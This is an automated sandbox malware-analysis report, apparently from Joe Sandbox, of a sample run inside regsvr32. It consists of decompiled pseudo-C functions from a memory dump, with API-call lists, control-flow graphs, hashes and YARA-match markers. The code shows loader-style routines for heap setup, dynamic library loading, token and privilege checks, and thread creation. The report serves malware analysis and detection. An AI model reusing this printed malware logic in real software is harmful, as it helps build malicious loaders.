                                                                                                                                                                        						_t48 = 0x54;
                                                                                                                                                                        						 *0x5baf828 = E05B9F05C(0x5bacbb8, _t48);
                                                                                                                                                                        						E05B96370(_t48, __eflags);
                                                                                                                                                                        						E05B98BF4( &_a8, 0xfffffffe);
                                                                                                                                                                        						_t36 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x39c);
                                                                                                                                                                        					}
                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                        					_t31 = CreateThread(0, 0, E05B96298, 0, 0,  &_v8);
                                                                                                                                                                        					 *0x5baf83c = _t31;
                                                                                                                                                                        					__eflags = _t31;
                                                                                                                                                                        					if(_t31 == 0) {
                                                                                                                                                                        						goto L3;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L7;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				E05B98BAF();
                                                                                                                                                                        				goto L3;
                                                                                                                                                                        			}














                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B98BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,05B96502), ref: 05B98BD2
                                                                                                                                                                          • Part of subcall function 05B9F05C: GetModuleHandleA.KERNEL32(00000000,?,?,?,05BACA50,?,05B9652B,?), ref: 05B9F07E
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 05B96541
                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,05B96298,00000000,00000000,?), ref: 05B965C8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Create$AttributesFileHandleHeapModuleThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 607385197-0
                                                                                                                                                                        • Opcode ID: 2548ca075a3df4e66856b382559e3431a0b19e4ec0eb548e7e2673c3124c6cd3
                                                                                                                                                                        • Instruction ID: 88386679ad2dfae234be5a17279436e8d6892b1897ad21ce80961758a6a6ae8d
                                                                                                                                                                        • Opcode Fuzzy Hash: 2548ca075a3df4e66856b382559e3431a0b19e4ec0eb548e7e2673c3124c6cd3
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F214CB1614208EBDF48AF78D84AABD3BE8EB05310F1085BAB519CB180DF74F580CB65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 307 5b9f05c-5b9f07c call 5b99dd8 310 5b9f07e-5b9f084 GetModuleHandleA 307->310 311 5b9f086-5b9f08b LoadLibraryA 307->311 312 5b9f08d-5b9f08f 310->312 311->312 313 5b9f09e-5b9f0ac call 5b98b9c 312->313 314 5b9f091-5b9f096 call 5b9f011 312->314 317 5b9f09b-5b9f09c 314->317 317->313
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E05B9F05C(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				char _t5;
                                                                                                                                                                        				struct HINSTANCE__* _t7;
                                                                                                                                                                        				void* _t10;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        				void* _t22;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                        				_t22 = __edx;
                                                                                                                                                                        				_t5 = E05B99DD8(_a4);
                                                                                                                                                                        				_t25 = 0;
                                                                                                                                                                        				_v8 = _t5;
                                                                                                                                                                        				_push(_t5);
                                                                                                                                                                        				if(_a4 != 0xf43) {
                                                                                                                                                                        					_t7 = LoadLibraryA(); // executed
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t7 = GetModuleHandleA();
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t7 != 0) {
                                                                                                                                                                        					_t10 = E05B9F011(_t12, _t22, _t7); // executed
                                                                                                                                                                        					_t25 = _t10;
                                                                                                                                                                        				}
                                                                                                                                                                        				E05B98B9C( &_v8);
                                                                                                                                                                        				return _t25;
                                                                                                                                                                        			}











                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,05BACA50,?,05B9652B,?), ref: 05B9F07E
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(00000000,?,?,?,05BACA50,?,05B9652B,?), ref: 05B9F08B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4133054770-0
                                                                                                                                                                        • Opcode ID: 983453fca2f9c590f5b7bfb0098ba8e88880c4c4cb8041c6ea13254c78b64c70
                                                                                                                                                                        • Instruction ID: fac5c919fc1198b0062a1701ab07a13b6e2de90157bb54a7bc87cc8321c9b49b
                                                                                                                                                                        • Opcode Fuzzy Hash: 983453fca2f9c590f5b7bfb0098ba8e88880c4c4cb8041c6ea13254c78b64c70
                                                                                                                                                                        • Instruction Fuzzy Hash: C2F0AE31300114ABDB1D9F6DE8458BAB7EDDF4426471040BAF506D3150DE71BE4086A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 319 5b9c8c9-5b9c8e8 call 5b9c79e 322 5b9c8ee-5b9c905 call 5b9c7f5 319->322 323 5b9c983-5b9c986 319->323 326 5b9c965-5b9c973 FindCloseChangeNotification 322->326 327 5b9c907-5b9c928 322->327 328 5b9c981 326->328 329 5b9c975-5b9c980 call 5b98bf4 326->329 327->326 333 5b9c92a-5b9c92c 327->333 328->323 329->328 334 5b9c958-5b9c963 333->334 335 5b9c92e-5b9c931 333->335 334->326 336 5b9c934-5b9c943 335->336 339 5b9c955-5b9c957 336->339 340 5b9c945-5b9c951 336->340 339->334 340->336 341 5b9c953 340->341 341->334
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E05B9C8C9(void* __ecx, void* __esi) {
                                                                                                                                                                        				intOrPtr* _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				char _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				short _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                        				char _t37;
                                                                                                                                                                        				union _TOKEN_INFORMATION_CLASS _t44;
                                                                                                                                                                        				char _t45;
                                                                                                                                                                        				intOrPtr* _t48;
                                                                                                                                                                        
                                                                                                                                                                        				_t37 = 0;
                                                                                                                                                                        				_v28 = 0x500;
                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                        				_t20 = E05B9C79E(__ecx);
                                                                                                                                                                        				_v16 = _t20;
                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                        					_push( &_v24);
                                                                                                                                                                        					_t44 = 2;
                                                                                                                                                                        					_t21 = E05B9C7F5(_t44); // executed
                                                                                                                                                                        					_t48 = _t21;
                                                                                                                                                                        					_v20 = _t48;
                                                                                                                                                                        					if(_t48 == 0) {
                                                                                                                                                                        						L10:
                                                                                                                                                                        						FindCloseChangeNotification(_v16);
                                                                                                                                                                        						if(_t48 != 0) {
                                                                                                                                                                        							E05B98BF4( &_v20, _t37);
                                                                                                                                                                        						}
                                                                                                                                                                        						return _t45;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push( &_v12);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0x220);
                                                                                                                                                                        					_push(0x20);
                                                                                                                                                                        					_push(2);
                                                                                                                                                                        					_push( &_v32);
                                                                                                                                                                        					_t29 =  *0x5baf820; // 0x5d5faa0
                                                                                                                                                                        					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					if( *_t48 <= 0) {
                                                                                                                                                                        						L9:
                                                                                                                                                                        						_t31 =  *0x5baf820; // 0x5d5faa0
                                                                                                                                                                        						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t9 = _t48 + 4; // 0x4
                                                                                                                                                                        					_t33 = _t9;
                                                                                                                                                                        					_v8 = _t33;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_push(_v12);
                                                                                                                                                                        						_push( *_t33);
                                                                                                                                                                        						_t34 =  *0x5baf820; // 0x5d5faa0
                                                                                                                                                                        						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t37 = _t37 + 1;
                                                                                                                                                                        						_t33 = _v8 + 8;
                                                                                                                                                                        						_v8 = _t33;
                                                                                                                                                                        						if(_t37 <  *_t48) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L9;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t45 = 1;
                                                                                                                                                                        					goto L9;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t20;
                                                                                                                                                                        			}





















                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B9C79E: GetCurrentThread.KERNEL32 ref: 05B9C7B1
                                                                                                                                                                          • Part of subcall function 05B9C79E: OpenThreadToken.ADVAPI32(00000000,?,?,05B9C8E3,00000000,05B90000), ref: 05B9C7B8
                                                                                                                                                                          • Part of subcall function 05B9C79E: GetLastError.KERNEL32(?,?,05B9C8E3,00000000,05B90000), ref: 05B9C7BF
                                                                                                                                                                          • Part of subcall function 05B9C79E: OpenProcessToken.ADVAPI32(00000000,?,?,05B9C8E3,00000000,05B90000), ref: 05B9C7E4
                                                                                                                                                                          • Part of subcall function 05B9C7F5: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,05B90000,00000000,00000000,?,05B9C876,00000000,00000000,?,05B9C89F), ref: 05B9C810
                                                                                                                                                                          • Part of subcall function 05B9C7F5: GetLastError.KERNEL32(?,05B9C876,00000000,00000000,?,05B9C89F,00001644,?,05B9DFCE), ref: 05B9C817
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,05B90000), ref: 05B9C96D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1806447117-0
                                                                                                                                                                        • Opcode ID: a106adbb036d27626f462960b5b31d7d9795c96ea0695aafe148e653b2223aef
                                                                                                                                                                        • Instruction ID: 0b6cc6f2dd550ef67b3fd40a8249d39d1a163ac288d4d4621f0c417c8f293cad
                                                                                                                                                                        • Opcode Fuzzy Hash: a106adbb036d27626f462960b5b31d7d9795c96ea0695aafe148e653b2223aef
                                                                                                                                                                        • Instruction Fuzzy Hash: 93215376A04206EFDF15DFA9D889EAEBBF8FF48610B1040B9E511E7151EB30BD418B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 342 5b96298-5b962b1 call 5b96412 GetOEMCP call 5b9df3d 347 5b962b3-5b962b4 342->347 348 5b962b6-5b962e1 call 5ba3bd5 342->348 349 5b9632b 347->349 352 5b962eb-5b962f1 call 5b9d804 348->352 353 5b962e3-5b962e9 348->353 356 5b962f6-5b962fd 352->356 354 5b96305-5b96311 353->354 357 5b96323 call 5b935a1 354->357 358 5b96313-5b96318 call 5b9611b 354->358 359 5b9631a-5b96321 356->359 360 5b962ff 356->360 364 5b96328-5b9632a 357->364 358->364 359->357 359->364 360->354 364->349
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B96298(void* __fp0) {
                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                        				intOrPtr _t17;
                                                                                                                                                                        				intOrPtr _t20;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				void* _t27;
                                                                                                                                                                        
                                                                                                                                                                        				_t32 = __fp0;
                                                                                                                                                                        				E05B96412();
                                                                                                                                                                        				GetOEMCP();
                                                                                                                                                                        				_t13 = E05B9DF3D(__fp0); // executed
                                                                                                                                                                        				 *0x5baf81c = _t13;
                                                                                                                                                                        				if(_t13 != 0) {
                                                                                                                                                                        					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
                                                                                                                                                                        					_t14 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        					_t2 = _t14 + 0x224; // 0x5b90000
                                                                                                                                                                        					E05BA3BD5( *_t2);
                                                                                                                                                                        					_t26 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        					_t25 = _t27;
                                                                                                                                                                        					__eflags =  *(_t26 + 0x1898) & 0x00010000;
                                                                                                                                                                        					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
                                                                                                                                                                        						_t7 = _t26 + 0x224; // 0x5b90000, executed
                                                                                                                                                                        						_t26 =  *_t7;
                                                                                                                                                                        						_t16 = E05B9D804( *_t7); // executed
                                                                                                                                                                        						__eflags = _t16;
                                                                                                                                                                        						_t17 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                        							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
                                                                                                                                                                        							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
                                                                                                                                                                        								L10:
                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                        								return 0;
                                                                                                                                                                        							}
                                                                                                                                                                        							L9:
                                                                                                                                                                        							E05B935A1();
                                                                                                                                                                        							goto L10;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
                                                                                                                                                                        						L6:
                                                                                                                                                                        						_t20 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                        							goto L9;
                                                                                                                                                                        						}
                                                                                                                                                                        						E05B9611B(_t25, _t26, __eflags, _t32);
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
                                                                                                                                                                        					goto L6;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t13 + 1;
                                                                                                                                                                        			}











                                                                                                                                                                        0x05b96305
                                                                                                                                                                        0x05b96305
                                                                                                                                                                        0x05b9630a
                                                                                                                                                                        0x05b96311
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b96313
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b96313
                                                                                                                                                                        0x05b962e3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b962e3
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetOEMCP.KERNEL32 ref: 05B9629D
                                                                                                                                                                          • Part of subcall function 05B9DF3D: GetCurrentProcessId.KERNEL32 ref: 05B9DF64
                                                                                                                                                                          • Part of subcall function 05B9DF3D: LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 05B9E057
                                                                                                                                                                          • Part of subcall function 05B9DF3D: GetLastError.KERNEL32 ref: 05B9E05E
                                                                                                                                                                          • Part of subcall function 05B9DF3D: GetSystemMetrics.USER32(00001000), ref: 05B9E06E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AccountCurrentErrorLastLookupMetricsProcessSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 253334094-0
                                                                                                                                                                        • Opcode ID: 6a96a2b910a7cf9c0bb757a4a823768e0e5dcbab9e726bb27f03164b3e359fbb
                                                                                                                                                                        • Instruction ID: 1290f6794dfd3d232a60c84a43db2f6fc0db6fe00bbe9d0a467b7f0ef91597b7
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a96a2b910a7cf9c0bb757a4a823768e0e5dcbab9e726bb27f03164b3e359fbb
                                                                                                                                                                        • Instruction Fuzzy Hash: 66011A35618212CECB18EF68E54ABF6BBE1FB06310F0582F6E445CB111CB70B481CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 365 5b9c879-5b9c892 367 5b9c894-5b9c895 365->367 368 5b9c896-5b9c8a3 call 5b9c862 365->368 371 5b9c8b9-5b9c8c4 FindCloseChangeNotification 368->371 372 5b9c8a5-5b9c8a8 368->372 375 5b9c8c6-5b9c8c8 371->375 373 5b9c8aa-5b9c8af 372->373 374 5b9c8b5-5b9c8b7 372->374 373->374 374->375
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B9C879(void* __ecx) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                        				void* _t13;
                                                                                                                                                                        				void* _t14;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        				intOrPtr _t18;
                                                                                                                                                                        				void* _t23;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t12 =  *0x5baf820; // 0x5d5faa0
                                                                                                                                                                        				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
                                                                                                                                                                        				if(_t13 != 0) {
                                                                                                                                                                        					_t14 = E05B9C862(); // executed
                                                                                                                                                                        					_t23 = _t14;
                                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                                        						FindCloseChangeNotification(_v8);
                                                                                                                                                                        						_t17 = _t23;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						if(_v8 != _t14) {
                                                                                                                                                                        							_t18 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        							 *((intOrPtr*)(_t18 + 0x30))(_v8);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t17 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					return _t17;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					return _t13;
                                                                                                                                                                        				}
                                                                                                                                                                        			}











                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 01f6817ba1b8c05ac2ecb4e0c9a21f6afe2983fd7e4a3b6cf2716b1436361e9b
                                                                                                                                                                        • Instruction ID: bffb27da10ab67b7abfd5975352885bb702d0f96f53c80ae74c4af56fee73c8f
                                                                                                                                                                        • Opcode Fuzzy Hash: 01f6817ba1b8c05ac2ecb4e0c9a21f6afe2983fd7e4a3b6cf2716b1436361e9b
                                                                                                                                                                        • Instruction Fuzzy Hash: 45F01732A10104EBDF14DBA4D986EFD7BF9FB08645F0141E5E501E7151DB30EE009B94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B9632E() {
                                                                                                                                                                        				intOrPtr _t3;
                                                                                                                                                                        
                                                                                                                                                                        				_t3 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        				 *((intOrPtr*)(_t3 + 0x2c))( *0x5baf83c, 0xffffffff);
                                                                                                                                                                        				ExitProcess(0);
                                                                                                                                                                        			}




                                                                                                                                                                        0x05b9632e
                                                                                                                                                                        0x05b9633b
                                                                                                                                                                        0x05b96345

                                                                                                                                                                        APIs
                                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 05B96345
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                        • Opcode ID: 79dfa205ef412dd209c314f5305e547f8e7039fa5239bc7df66caf688aeed634
                                                                                                                                                                        • Instruction ID: 3991d03a69f8a1d7ee952bd15647e19a71af0a762403b9607ef2be420c0017d7
                                                                                                                                                                        • Opcode Fuzzy Hash: 79dfa205ef412dd209c314f5305e547f8e7039fa5239bc7df66caf688aeed634
                                                                                                                                                                        • Instruction Fuzzy Hash: 07C00279224010DFC7409B64E84BFB47BE0EB09322F1187A1F529DB1E5CF20A4819B44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B98BDE(long _a4) {
                                                                                                                                                                        				void* _t2;
                                                                                                                                                                        
                                                                                                                                                                        				_t2 = RtlAllocateHeap( *0x5baf900, 8, _a4); // executed
                                                                                                                                                                        				return _t2;
                                                                                                                                                                        			}




                                                                                                                                                                        0x05b98bec
                                                                                                                                                                        0x05b98bf3

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,05B9959D,00000100,?,05B96507), ref: 05B98BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: daf975604e1c808c338b477f1eb976acdc928934e8c6dde97dd20e77e37336eb
                                                                                                                                                                        • Instruction ID: 2a64859f90c7e9b2590108be5e3b9b29854c1c08403cb75e1a2861629159cf8f
                                                                                                                                                                        • Opcode Fuzzy Hash: daf975604e1c808c338b477f1eb976acdc928934e8c6dde97dd20e77e37336eb
                                                                                                                                                                        • Instruction Fuzzy Hash: 6FB092350A020CBBCB111A91EC07A983F29F704691F004010F60D06060DF62B420AB80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E05B9DA57(void* __ecx) {
                                                                                                                                                                        				signed int _t4;
                                                                                                                                                                        
                                                                                                                                                                        				_t4 = ResumeThread( *(__ecx + 4));
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				return  ~_t4 & 0x00000001;
                                                                                                                                                                        			}




                                                                                                                                                                        0x05b9da5f
                                                                                                                                                                        0x05b9da67
                                                                                                                                                                        0x05b9da6c

                                                                                                                                                                        APIs
                                                                                                                                                                        • ResumeThread.KERNELBASE(?,05B9D8C2,?,?,00000001), ref: 05B9DA5F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                        • Opcode ID: c3d60b9d3c5a18ffc839739aa86638805d87d55099bd44b630e7b96b549d9f97
                                                                                                                                                                        • Instruction ID: 33b87a5cb5967255df3979ad1aa328055f4ed920e4d5afc4b13d74ac0950892c
                                                                                                                                                                        • Opcode Fuzzy Hash: c3d60b9d3c5a18ffc839739aa86638805d87d55099bd44b630e7b96b549d9f97
                                                                                                                                                                        • Instruction Fuzzy Hash: 67B092362A00019BCB004B74E80B9E07BE0FB56606798C2F0B005C6061C72AD4868A80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B98BC9() {
                                                                                                                                                                        				void* _t1;
                                                                                                                                                                        
                                                                                                                                                                        				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                                                                                                                        				 *0x5baf900 = _t1;
                                                                                                                                                                        				return _t1;
                                                                                                                                                                        			}




                                                                                                                                                                        0x05b98bd2
                                                                                                                                                                        0x05b98bd8
                                                                                                                                                                        0x05b98bdd

                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00096000,00000000,05B96502), ref: 05B98BD2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                                                        • Opcode ID: 4160c0db15c7c93c1c8f06a5a5d590b3dd858ddb7ab87db21daef920b0e64c87
                                                                                                                                                                        • Instruction ID: 07f934c21631dc35fecc01074202cd7678e0bfb21ec34dbbd3a6e2cb7411ca00
                                                                                                                                                                        • Opcode Fuzzy Hash: 4160c0db15c7c93c1c8f06a5a5d590b3dd858ddb7ab87db21daef920b0e64c87
                                                                                                                                                                        • Instruction Fuzzy Hash: D3B0127439130076D6200B105C07B413D106380B42F104000B6069E1C0EFA03000A504
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                        			E05B9DA6D(void* __ecx, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                        				signed int* _t36;
                                                                                                                                                                        				signed int* _t39;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_t36 = _a8;
                                                                                                                                                                        				_t28 = _t36[1];
                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                        					_t39 = _t36[2];
                                                                                                                                                                        					do {
                                                                                                                                                                        						_a8 = _a8 & 0x00000000;
                                                                                                                                                                        						if(_t39[2] > 0) {
                                                                                                                                                                        							_t31 = _t39[3];
                                                                                                                                                                        							_t22 = _a4 + 0x24;
                                                                                                                                                                        							_v12 = _a4 + 0x24;
                                                                                                                                                                        							_v8 = _t39[3];
